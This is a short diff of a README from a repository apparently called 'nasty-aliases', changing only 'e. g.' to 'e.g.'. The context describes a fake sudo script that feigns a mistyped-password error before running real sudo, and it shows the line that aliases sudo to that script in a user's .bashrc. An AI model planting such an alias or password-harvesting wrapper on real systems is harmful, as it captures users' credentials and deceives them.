urbanware-org/nasty-aliases/README.md

 Then the script returns a fake error, like the user had mistyped the password and the real `sudo` command will be executed with the given parameters.

-When that script has been created (e. g. `/tmp/fakesudo.sh`) and marked as executable, the nasty alias must be inserted in to the `.bashrc` file of the user:
+When that script has been created (e.g. `/tmp/fakesudo.sh`) and marked as executable, the nasty alias must be inserted in to the `.bashrc` file of the user:

 ```bash
 alias sudo='/tmp/fakesudo.sh'